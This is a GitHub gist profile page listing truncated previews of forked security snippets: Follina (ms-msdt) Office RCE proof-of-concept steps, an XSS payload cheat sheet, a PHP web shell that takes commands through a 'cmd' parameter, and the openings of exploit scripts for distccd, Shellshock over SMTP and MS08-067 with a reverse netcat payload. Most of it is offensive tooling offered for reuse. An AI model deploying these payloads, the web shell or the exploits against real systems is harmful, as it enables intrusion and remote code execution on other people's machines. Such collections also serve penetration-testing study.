Skip to content

Instantly share code, notes, and snippets.

View cxzero's full-sized avatar
☺️

Juan Pablo Perata cxzero

☺️
70 followers · 897 following
View GitHub Profile
@cxzero
cxzero / watcher-executor.cs
Created July 19, 2024 20:38 — forked from 2S1one/watcher-executor.cs
using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Diagnostics;
public class FileWatcher
{
static FileSystemWatcher watcher;
static Process p;
@cxzero
cxzero / watcher-network.cs
Created July 19, 2024 20:38 — forked from 2S1one/watcher-network.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Net.Sockets;
namespace tcp_client_file_write
{
internal class Program
{
@cxzero
cxzero / ms-msdt.MD
Created June 10, 2022 01:30 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@cxzero
cxzero / xss_vectors.txt
Created May 13, 2022 16:17 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@cxzero
cxzero / distccd_rce_CVE-2004-2687.py
Created August 14, 2021 17:50 — forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from a public Metasploit exploit code :
https://www.exploit-db.com/exploits/9915
@cxzero
cxzero / command.xml
Created July 16, 2021 13:38 — forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page if you want a html wrapper to present the file can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID the successful response in as an example)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
@cxzero
cxzero / easy-simple-php-webshell.php
Created May 12, 2021 03:27 — forked from joswr1ght/easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@cxzero
cxzero / exploit.py
Created May 1, 2021 05:02 — forked from claudijd/exploit.py
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
@cxzero
cxzero / ms08-067-fixed.py
Last active April 9, 2021 04:40 — forked from thel3l/ms08-067-fixed.py
Updated ms08-67 exploit without custom netcat listener.
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct